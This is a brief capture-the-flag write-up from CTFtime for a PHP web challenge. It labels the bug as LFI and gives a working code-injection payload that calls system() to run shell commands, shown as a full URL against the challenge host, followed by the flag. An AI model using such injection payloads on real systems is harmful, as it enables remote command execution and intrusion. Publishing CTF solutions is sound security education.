CTFtime.org

Old version

by zer0d4y / No[va]Sec

Tags: web 

Rating: 4.5

### WEB - Old version

![image](https://github.com/zer00d4y/writeups/assets/128820441/593b6532-10e1-492c-9145-ee326ab772ca)

Here we see that this is an LFI vulnerability.

Payload:

' and die(system("cat index.php")) or '

http://62.173.140.174:46005/index.php?page=' and die(system("cat index.php")) or '

FLAG:

CODEBY{php_lf1_t0_rc3_d0ne}

Original writeup (https://github.com/zer00d4y/writeups/blob/main/CTF%20events/Cybercoliseum/Cybercoliseum%20%E2%85%A2.md).

Comments